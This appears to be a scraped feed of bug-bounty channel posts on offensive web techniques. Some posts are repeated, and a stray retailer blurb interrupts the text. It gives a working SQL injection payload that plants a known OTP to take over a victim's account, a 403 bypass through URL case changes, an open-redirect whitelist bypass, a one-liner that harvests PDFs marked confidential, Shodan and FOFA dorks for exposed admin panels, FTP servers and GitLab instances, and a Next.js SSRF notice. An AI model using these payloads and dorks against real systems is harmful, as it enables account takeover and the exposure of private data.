Case Insensitivity Vulnerability
/api/docs/index.html ==> 403 Forbidden
/api/Docs/index.html ==> 200 Ok
👍7❤3
SQL Injection to Account Takeover Manually :)
1. Enter mobile number to login intercept
{"mobile_number":"8888888888"} >> 200
{"mobile_number":"8888888888'"} >> 500
{"mobile_number":"8888888888''"} >> 200
2. Final Query:
8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') --
2024-04-03 21:20:55 >> Exact time and date
1 >> attempts
you can see the 200 response
last you can login with the 1110 OTP and get access to the victim account :)
Credit- Kullai
1. Enter mobile number to login intercept
{"mobile_number":"8888888888"} >> 200
{"mobile_number":"8888888888'"} >> 500
{"mobile_number":"8888888888''"} >> 200
2. Final Query:
8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') --
2024-04-03 21:20:55 >> Exact time and date
1 >> attempts
you can see the 200 response
last you can login with the 1110 OTP and get access to the victim account :)
Credit- Kullai
👍7❤5
Bypass open redirection whitelisted using chinese dots: 👀🔓🔍
%E3%80%82
Tip: Keep eyes on SSO redirects 😉🔀
credit: @adrielsec
%E3%80%82
Tip: Keep eyes on SSO redirects 😉🔀
credit: @adrielsec
🫡6❤4🔥2
🚨Subdominator - Unleash the Power of Subdomain Enumeration🚨
📢Subdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources.
🔗Link- https://github.com/RevoltSecurities/Subdominator
📢Subdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources.
🔗Link- https://github.com/RevoltSecurities/Subdominator
🔥6❤3👍3😁1
♨️One-liner to find sensitive PDF file♨️
for i in `cat apex-domains.txt | gau --subs --threads 16 | grep -Ea '\.pdf' | httpx -silent -mc 200`; do if curl -s "$i" | pdftotext -q - - | grep -Eaiq 'internal use|classified'; then echo $i; fi; done
❤21👍1
🚨Gourlex🚨
📢It is a simple tool that can be used to extract URLs and paths from web pages. It can be helpful during web application assessments to uncover additional targets.
🔗Link https://github.com/trap-bytes/gourlex
📢It is a simple tool that can be used to extract URLs and paths from web pages. It can be helpful during web application assessments to uncover additional targets.
🔗Link https://github.com/trap-bytes/gourlex
❤4👍4🗿1
shodan dorks for recon :
1. http://ssl.cert.subject.CN:"*.target.com" http.noscript:"index of/"
2. http://ssl.cert.subject.CN:"*.target.com" http.noscript:"gitlab"
3. http://ssl.cert.subject.CN:"*. http://target.com" http.noscript:"gitlab"
4. http://ssl.cert.subject.CN:"*.target.com" "230 login successful" port:"21"
5. http://ssl.cert.subject.CN:"*. http://target.com" +200 http.noscript:"Admin"
1. http://ssl.cert.subject.CN:"*.target.com" http.noscript:"index of/"
2. http://ssl.cert.subject.CN:"*.target.com" http.noscript:"gitlab"
3. http://ssl.cert.subject.CN:"*. http://target.com" http.noscript:"gitlab"
4. http://ssl.cert.subject.CN:"*.target.com" "230 login successful" port:"21"
5. http://ssl.cert.subject.CN:"*. http://target.com" +200 http.noscript:"Admin"
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
👍4🔥2❤1
🚨CVE-2024-34351:Next.js SSRF in Server Actions🚨
📢 Security researchers at Assetnote have identified a SSRF vulnerability in Next.js Server Actions. If the Host header is modified, and certain conditions are met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.
📝Dorks--->
Hunter:/product.name="Next.js"
FOFA:app="Next.js"
SHODAN:http.component:"Next.js"
🔗PoC: https://lnkd.in/gKbjiHVY
⚠Stay vigilant and take necessary precautions to protect your applications.
📢 Security researchers at Assetnote have identified a SSRF vulnerability in Next.js Server Actions. If the Host header is modified, and certain conditions are met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.
📝Dorks--->
Hunter:/product.name="Next.js"
FOFA:app="Next.js"
SHODAN:http.component:"Next.js"
🔗PoC: https://lnkd.in/gKbjiHVY
⚠Stay vigilant and take necessary precautions to protect your applications.
❤2🎄1